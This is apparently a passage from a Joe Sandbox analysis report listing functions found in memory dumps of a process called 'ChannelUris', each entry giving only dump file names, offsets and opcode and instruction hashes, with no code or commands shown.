                                                                                                            Function 04B18590 Relevance: .1, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 710f2ac7a1c6f3baa74e0e9e562c9bfc463e4887ab4d98ed0269e75cac971e4f
                                                                                                            • Instruction ID: e6928ef206011b0cff13b90bbab435ca417ec9568bf98675307020aa155922b3
                                                                                                            • Opcode Fuzzy Hash: 710f2ac7a1c6f3baa74e0e9e562c9bfc463e4887ab4d98ed0269e75cac971e4f
                                                                                                            • Instruction Fuzzy Hash: AD5106386402049FEB19AF74D59093A7BB3FF89319B504568E9158B361EB36EC41DBB0
                                                                                                            Function 092B7CB0 Relevance: .1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 92a823d2cd1eb9ad7963217c7c6e8c6594bfd9f554d6f4ff6acb4d96997cc1ee
                                                                                                            • Instruction ID: 473d9c1f9679aeccac9651ced8d2ea4fc0dafb1cdb80ba7a30a885feab7693a2
                                                                                                            • Opcode Fuzzy Hash: 92a823d2cd1eb9ad7963217c7c6e8c6594bfd9f554d6f4ff6acb4d96997cc1ee
                                                                                                            • Instruction Fuzzy Hash: 5441A231924206DFD719EF78C28A6B87FF8FF86384B25429DD4468E972D732A601CB44
                                                                                                            Function 04B1EEC0 Relevance: .1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b7d08b7b282641104c2a1ab45c71306d6b05c211eb15ea10bb263c1283ac5307
                                                                                                            • Instruction ID: bf51c28689e0fec14c6955a5a4a70e6f67ed4d85cd8374f46293410bd827bbed
                                                                                                            • Opcode Fuzzy Hash: b7d08b7b282641104c2a1ab45c71306d6b05c211eb15ea10bb263c1283ac5307
                                                                                                            • Instruction Fuzzy Hash: D3414F32B00104CFD794DB69D884BAAB3B2FB88311FA484B6EA0DC7670E731ED458B51
                                                                                                            Function 04B196B1 Relevance: .1, Instructions: 128COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c301ea85dcb37b7a6fd66dc5b6a307bdf466c7156fb439bb0206575a7a464188
                                                                                                            • Instruction ID: 9df53eb8a63eeae107177a15696f568848e0270486fd2d2ffe044f799118cb13
                                                                                                            • Opcode Fuzzy Hash: c301ea85dcb37b7a6fd66dc5b6a307bdf466c7156fb439bb0206575a7a464188
                                                                                                            • Instruction Fuzzy Hash: 8A512974A006458FCB15CF58C8A4AAEFBB2FF89314F648598E915A73A1C335ED42CF50
                                                                                                            Function 04B17901 Relevance: .1, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e23674ce36c15331fad7d5b39e9aa32405e9069a6a7d61247084107c0034055a
                                                                                                            • Instruction ID: e806afec4c6a8bb01865819eaa26e118f594886db77dbcae4608fa1d8bdfa20c
                                                                                                            • Opcode Fuzzy Hash: e23674ce36c15331fad7d5b39e9aa32405e9069a6a7d61247084107c0034055a
                                                                                                            • Instruction Fuzzy Hash: 19418C31705200DFEB15DB64C5A8AAE7BB6EF99340F5540A8E506EB3B0DF34AC41CB90
                                                                                                            Function 04B17B5B Relevance: .1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cad4089e18b1b7085efd36d1fbbb4e65a060a4ac623fb54abb04dbf205b778e8
                                                                                                            • Instruction ID: a8f01a964eaea83878f99170284de7903ab4fb7ff34d1787c18fd8dc2aa5c277
                                                                                                            • Opcode Fuzzy Hash: cad4089e18b1b7085efd36d1fbbb4e65a060a4ac623fb54abb04dbf205b778e8
                                                                                                            • Instruction Fuzzy Hash: 7F416D70A00249DFDB14DFA9C9946AEBBF2FF89300F54846DD406AB3A4DB74AC46CB50
                                                                                                            Function 093ADD60 Relevance: .1, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77ece3e5bd9c1cad59a084ef8c91486ecc4cc8a721dd8aee873458159db29c9a
                                                                                                            • Instruction ID: 6f2652237355680fc30b2ad96412c3624604e77ade51a1fe971f5ed0cbeb6d16
                                                                                                            • Opcode Fuzzy Hash: 77ece3e5bd9c1cad59a084ef8c91486ecc4cc8a721dd8aee873458159db29c9a
                                                                                                            • Instruction Fuzzy Hash: 3F4178B9D052589FCF00CFA9D980A9EFBB1FB59310F14A02AE915B7210D735A951CF58
                                                                                                            Function 04B12BB0 Relevance: .1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01b88f45835892faf53dae15aca85b09c2404e283a51677d5d287d0391768bf9
                                                                                                            • Instruction ID: f40f9548f5dfe0939a9c7311ff9377676c093873700848b115578414e8e39489
                                                                                                            • Opcode Fuzzy Hash: 01b88f45835892faf53dae15aca85b09c2404e283a51677d5d287d0391768bf9
                                                                                                            • Instruction Fuzzy Hash: B1414674A00609DFCB09CF58C5949AAFBB1FF88310B658599DA05AB365C336FC90CFA4
                                                                                                            Function 04B19C70 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a3a5973213c404e95646c520326f4acabe6726cb465c890c1ea139dd49f4533
                                                                                                            • Instruction ID: 44eb895bdd9672809c8090d81d61314253486998ade9623a40e89eefffac58c4
                                                                                                            • Opcode Fuzzy Hash: 1a3a5973213c404e95646c520326f4acabe6726cb465c890c1ea139dd49f4533
                                                                                                            • Instruction Fuzzy Hash: 0B31A0B1A00194CBDB14DF78C4297EE7BF2EB48710F5184BAD542AB3A4CB346C84DBA1
                                                                                                            Function 092BBD00 Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32dcc1eb23329319f90667e5e76e812776406dd93a15aa6c4be73c144c3086be
                                                                                                            • Instruction ID: 40f990422127fb9d369ac298b3657b6b66690d762a5e335540884b019dd6fd67
                                                                                                            • Opcode Fuzzy Hash: 32dcc1eb23329319f90667e5e76e812776406dd93a15aa6c4be73c144c3086be
                                                                                                            • Instruction Fuzzy Hash: 27419131A102168FDB14DF65C945AFEBBF1FF88390F008429E905DB291D738D945CBA1
                                                                                                            Function 092B7E99 Relevance: .1, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b09cc3b9ac76652cac57cd5cf6840a6bcbeb76d79056f84d83a8602c9f55978e
                                                                                                            • Instruction ID: feda790583ce30f51fe589213555a1f879021d0199455b0c6d237c9da88357d0
                                                                                                            • Opcode Fuzzy Hash: b09cc3b9ac76652cac57cd5cf6840a6bcbeb76d79056f84d83a8602c9f55978e
                                                                                                            • Instruction Fuzzy Hash: DD4132B4E142099FDB40CFAAD444AEEBBF6FF88300F008069D519AB744DB74A886CF51
                                                                                                            Function 078A16A3 Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cbcc5fa0ed62f80160a00d3daaa200435f90508dd602c05f0f5f6676931a4712
                                                                                                            • Instruction ID: 8e7fd0ef16bb588114370b5d8d60e85d7979d335971e61b5cd28d8d3ff720754
                                                                                                            • Opcode Fuzzy Hash: cbcc5fa0ed62f80160a00d3daaa200435f90508dd602c05f0f5f6676931a4712
                                                                                                            • Instruction Fuzzy Hash: 833128B5F0420EAFEB149E64D45866ABBB2EFE1210F2480AAD545CB258DE35CC51C751
                                                                                                            Function 092B68B8 Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 53f243ef35f2a87f5d4c04fceb560a57dfd1022b504c6b7998b764e6c7f3486e
                                                                                                            • Instruction ID: e3fa9c86cc19630f043032fa55d2c5c23224cd0454a43dad06f1c5049aab6072
                                                                                                            • Opcode Fuzzy Hash: 53f243ef35f2a87f5d4c04fceb560a57dfd1022b504c6b7998b764e6c7f3486e
                                                                                                            • Instruction Fuzzy Hash: D34102B0E25609DFDB04CFAAD644BEEBBF6BB88350F10802AE518AB254D7745A45CF50
                                                                                                            Function 04B19C80 Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 53dc585bc373ed3aec5d7a3fd8454c162b1c91fe89ed40b68a06d250b080fe69
                                                                                                            • Instruction ID: 1c99fc58a1808f07ef0e556e7f7d8c92fceb1b368dcf0a34b5250f42e8e07cb5
                                                                                                            • Opcode Fuzzy Hash: 53dc585bc373ed3aec5d7a3fd8454c162b1c91fe89ed40b68a06d250b080fe69
                                                                                                            • Instruction Fuzzy Hash: 6931A5B1A00194CBDB14DFB8C4687EE77F2EB48710F5184B5D506A73A4CB746C44DB91
                                                                                                            Function 093AD4F8 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48931ff92a522eea2a4ad9f1966797d88bd54d80bd15c92859853d6d11e8eb64
                                                                                                            • Instruction ID: b2d08ba54df40269ef96098fddecc03b218c6abfde6c02c6a4a74dd697825f34
                                                                                                            • Opcode Fuzzy Hash: 48931ff92a522eea2a4ad9f1966797d88bd54d80bd15c92859853d6d11e8eb64
                                                                                                            • Instruction Fuzzy Hash: 4031A8B9D012489FDF14CFA9D980A9EFBF0EB49310F24942AE815B7210D735A945CF58
                                                                                                            Function 092B7EA8 Relevance: .1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c9208d8d38018dc95daabdf3912ef62a324641744bd3df24dcdc0dea13d99502
                                                                                                            • Instruction ID: a57629298c12acb1014046e02acd431789bf7d7b00521bed64b60ca792891ef5
                                                                                                            • Opcode Fuzzy Hash: c9208d8d38018dc95daabdf3912ef62a324641744bd3df24dcdc0dea13d99502
                                                                                                            • Instruction Fuzzy Hash: 6A4111B4E142099FDB44CFAAD444AEEBBF6FF89300F008069D619AB744DB746986CF51
                                                                                                            Function 093AE6C0 Relevance: .1, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 91a465aec023d5ab88c45cc93d23f1768c09355a8c9e69b09aef05335e624814
                                                                                                            • Instruction ID: d486bfbed75eff0a5368d25014c8cef968a2401acfc85b113e07d755806c54c7
                                                                                                            • Opcode Fuzzy Hash: 91a465aec023d5ab88c45cc93d23f1768c09355a8c9e69b09aef05335e624814
                                                                                                            • Instruction Fuzzy Hash: 1B31BAB9D012589FDF10CFA9D884ADEFBB0EF49310F24901AE815B7210C735A941CF94
                                                                                                            Function 092BC6C0 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e1789ad93e676c8b66a568a299ac29352e6e45cae0189b075fa9e0a9c8e736e
                                                                                                            • Instruction ID: 68d28e5de12f2fb0bb03bd5ce7b0fc4f96bed86f30e8872a35f531f7f2afed26
                                                                                                            • Opcode Fuzzy Hash: 8e1789ad93e676c8b66a568a299ac29352e6e45cae0189b075fa9e0a9c8e736e
                                                                                                            • Instruction Fuzzy Hash: 81410579A112288FEB64DF28C991F99B7F5FB48750F1041D9EA09AB3A1C731AD81CF50
                                                                                                            Function 0983E6A0 Relevance: .1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5394a50f7ca3b17edc6f155a2216fb814ee3b5de9202fd99dfbed94d0bdcd6db
                                                                                                            • Instruction ID: 7982bf4624b98745a7b25fc3b7fa6f6d2a97a157eb411947417c03fc3b3869af
                                                                                                            • Opcode Fuzzy Hash: 5394a50f7ca3b17edc6f155a2216fb814ee3b5de9202fd99dfbed94d0bdcd6db
                                                                                                            • Instruction Fuzzy Hash: 8F411974A01218DFEB94CF28D898BA9B7F2FB48310F40C1A9E51AE7391DB749985CF51
                                                                                                            Function 093ADBE0 Relevance: .1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c692efcedf4b507e63e400f1cdb8015fdbe80cd8b8ee0755c55d5fecf0bdb638
                                                                                                            • Instruction ID: 79552c51696cf5fc94982d32b0ce61951b9eee435e99e46b54beee834d75c3db
                                                                                                            • Opcode Fuzzy Hash: c692efcedf4b507e63e400f1cdb8015fdbe80cd8b8ee0755c55d5fecf0bdb638
                                                                                                            • Instruction Fuzzy Hash: 063137B8E042089FCF14CFA9D98099EFBF1BF49310F14A12AE824B7360D774A9418F58
                                                                                                            Function 092B6AF0 Relevance: .1, Instructions: 86COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e50c4dbdb3542c0b277b8e17fc5162ac1abe20f02fc631622f305f6f6d2a5919
                                                                                                            • Instruction ID: 74bc37b1117dfb6e685795e35fcbd6b247a55a91bb615612d07b7081185543dc
                                                                                                            • Opcode Fuzzy Hash: e50c4dbdb3542c0b277b8e17fc5162ac1abe20f02fc631622f305f6f6d2a5919
                                                                                                            • Instruction Fuzzy Hash: FF31E570E10A1ACBDB14CFAAD554BEEBBF2AB88360F149129D524B7250E7705941CB51
                                                                                                            Function 092BDE6E Relevance: .1, Instructions: 84COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5abd6742985c5df98f564d1b8715209c1a5825da4832d2750e205a19ebe4add8
                                                                                                            • Instruction ID: a55a902d9e0ecab3e900e3f439e608702399bcc0d2807eed38de24782141db62
                                                                                                            • Opcode Fuzzy Hash: 5abd6742985c5df98f564d1b8715209c1a5825da4832d2750e205a19ebe4add8
                                                                                                            • Instruction Fuzzy Hash: 7C318E70700705CFCB25EF35D444AAAB7B6FF85355710892CE9168B7A1DB71E846CB90
                                                                                                            Function 04B1AEE0 Relevance: .1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 660cea130abb35287c8e0a8eb47a14a192abc101c7f73a95849a63a367fbd64c
                                                                                                            • Instruction ID: 17e66d659106c6f11ac3767c4687a610d297d082ca6df5c81b0bfc2e858ddb30
                                                                                                            • Opcode Fuzzy Hash: 660cea130abb35287c8e0a8eb47a14a192abc101c7f73a95849a63a367fbd64c
                                                                                                            • Instruction Fuzzy Hash: 2521D170B011468FD705DB79D945AAF7BB2EB88310F1484BAE606DB3A4EB30AD05CB91
                                                                                                            Function 093AFEB8 Relevance: .1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dcf22de7b703a6a33db1a29ce5b5ee6b2d98f705b73739bce829d6b3d139b845
                                                                                                            • Instruction ID: e2345da4c10e8110771e73d32889b70e2f054c615bb69fd420cce1cef21da131
                                                                                                            • Opcode Fuzzy Hash: dcf22de7b703a6a33db1a29ce5b5ee6b2d98f705b73739bce829d6b3d139b845
                                                                                                            • Instruction Fuzzy Hash: 0021D3317043568FD715AB3AD81059EBFA2EFC6210718866ED509CB352DA74DD078BE1
                                                                                                            Function 078A3F6C Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4967cff09a9f32be0f537c68584fcbf0bccfc2833631d11b9b9cdc89d2871ad5
                                                                                                            • Instruction ID: 4442bf33104c48a7991da8a1c9dffe5592cf81c99e2f98db6cfb272b946eead1
                                                                                                            • Opcode Fuzzy Hash: 4967cff09a9f32be0f537c68584fcbf0bccfc2833631d11b9b9cdc89d2871ad5
                                                                                                            • Instruction Fuzzy Hash: E23189B0D0828AEFEF15CFA9C4046EEBBB1EF56305F10806AD014E7291D7781946CFA1
                                                                                                            Function 092BDD90 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02621d4cbe4c456486c40a601384c4605b6ba4a7831f839cb9f7922c98f8f115
                                                                                                            • Instruction ID: 6f9e0bb830552978cba293a902bbd46aaa9a629121376cabf7ca6cb4785b759d
                                                                                                            • Opcode Fuzzy Hash: 02621d4cbe4c456486c40a601384c4605b6ba4a7831f839cb9f7922c98f8f115
                                                                                                            • Instruction Fuzzy Hash: 65217AB1A2020ADFDB10DF78D5047EEBBF4AB54380F118066E959DB290E734DA50CB91
                                                                                                            Function 04A2DAE8 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414268837.0000000004A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4a2d000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ed0f59d4235bc81e7119ac2cacf76df75c528b89645e07e8cc0a23c20f82cebf
                                                                                                            • Instruction ID: 630b60fb4f0128014691423accb27eddf57783eb74a830b1c3085ce03f3381a8
                                                                                                            • Opcode Fuzzy Hash: ed0f59d4235bc81e7119ac2cacf76df75c528b89645e07e8cc0a23c20f82cebf
                                                                                                            • Instruction Fuzzy Hash: EE212572604240EFDB44DF18DAD0F26BB65FBA4324F24856DD9090B257C336E456EBA1
                                                                                                            Function 04A3D01C Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414484347.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4a3d000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bbac32c17361927c5bc8eb59cad8623d06153daf86e56070ce4759aa74e9a3f
                                                                                                            • Instruction ID: c4073242e6052dde599560d0840382463cac8c2eadb478bc4658f9729cbd3f1f
                                                                                                            • Opcode Fuzzy Hash: 9bbac32c17361927c5bc8eb59cad8623d06153daf86e56070ce4759aa74e9a3f
                                                                                                            • Instruction Fuzzy Hash: 21212571204244DFEB11DF14E9C4B16BB65FB85B15F248569F90A0B242D336E44BCBA2
                                                                                                            Function 092BA8C8 Relevance: .1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cbfb795fbc11b12f653360af57131e590baecb4d40ab1a098dadbcc40668717
                                                                                                            • Instruction ID: f60f13f716e8702186dd921ad8fa8fc6b0028e419ddfc0887e95f1318db6e06f
                                                                                                            • Opcode Fuzzy Hash: 9cbfb795fbc11b12f653360af57131e590baecb4d40ab1a098dadbcc40668717
                                                                                                            • Instruction Fuzzy Hash: 28216D31A00119DFCF05CFA8C448AED7FF2EB8C320F159129E416A7390CB759882DB60
                                                                                                            Function 092BDCCF Relevance: .1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
